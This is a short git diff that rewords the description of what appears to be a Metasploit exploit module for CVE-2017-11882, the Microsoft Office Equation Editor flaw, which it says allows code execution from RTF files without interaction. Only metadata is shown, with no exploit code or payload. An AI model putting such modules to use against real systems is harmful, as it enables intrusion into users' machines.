diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 291fe040452b..9dc87de6a89d 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -16,11 +16,10 @@ def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office CVE-2017-11882',
'Description' => %q{
- Module exploits a flaw in the Equation Editor, developed
- in 2000, that allowed any OLE object to execute in a separate
- address space. Compared to original PoC, allows for a command within
- a length of 109 bytes to be executed Affects Microsoft Office word for the latest
- 17 years.
+ Module exploits a flaw in how the Equation Editor that
+ allows an attacker to execute arbitrary code in RTF files without
+ interaction. The vulnerability is caused by the Equation Editor,
+ to which fails to properly handle OLE objects in memory.
},
'Author' => ['mumbai', 'embedi'],
'License' => MSF_LICENSE,